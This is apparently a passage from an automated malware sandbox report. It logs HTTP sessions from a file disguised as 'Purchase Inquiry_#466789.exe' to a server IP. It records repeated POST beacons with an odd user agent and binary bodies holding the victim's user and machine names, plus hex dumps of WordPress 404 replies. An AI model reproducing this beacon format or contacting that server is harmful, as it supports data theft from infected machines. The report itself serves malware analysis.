                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:44.488341093 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:44.488378048 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:44.488411903 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:44.488445997 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:44.488476992 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:44.488511086 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:44.488543034 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:44.488576889 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:44.488610029 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.44978345.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:46.674160957 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:46.679063082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:48.828109026 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:47 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:48.828167915 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:48.828203917 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:48.828236103 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:48.828272104 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:48.828305960 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:48.828341007 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:48.828375101 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:48.828412056 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:33:48.828448057 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.44978445.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:49.414221048 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:49.419390917 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:51.596375942 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:49 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:51.596431017 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:33:51.596467972 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:33:51.596506119 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:33:51.596540928 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:33:51.596575975 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:33:51.596609116 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:51.596642971 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:51.596676111 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:51.596712112 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.44978545.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:51.763360977 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
